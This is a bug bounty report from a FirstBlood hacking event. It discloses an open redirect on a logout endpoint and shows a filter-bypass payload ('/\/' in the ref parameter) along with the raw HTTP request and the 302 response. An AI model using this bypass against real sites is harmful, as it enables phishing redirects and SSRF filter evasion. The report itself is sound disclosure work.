FirstBlood-#92Open redirect at

On 2021-05-10, 0xconft reported:

Hi there,

I found an open redirect on your website at /drpanel/logout.php endpoint on ref parameter. There's filter in place where it must start with / and also // is filtered but i end up bypassing this with this payload "/\/" which will be reflected as "//" at location header thus will redirect victim to An example of impact caused by this vulnerability is this vulnerability can be combined with SSRF attack to bypassing filter or it can be used for phising.



GET /drpanel/logout.php?ref=/\/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate  
Connection: close
Cookie: drps=5a5cfb7c6047d6dc8dbc411b2
Upgrade-Insecure-Requests: 1


HTTP/1.1 302 Found
Server: nginx
Date: Mon, 10 May 2021 06:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: //
Content-Length: 0

P4 Low

Endpoint: /drpanel/logout.php

Parameter: ref

Payload: /\/

FirstBlood ID: 1
Vulnerability Type: Open Redirect

There is an open url redirect vulnerability on /logout.php. The code expects it to start with / and does not allow to redirect to external domains but this can be bypassed.

Respect Earnt: 1000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.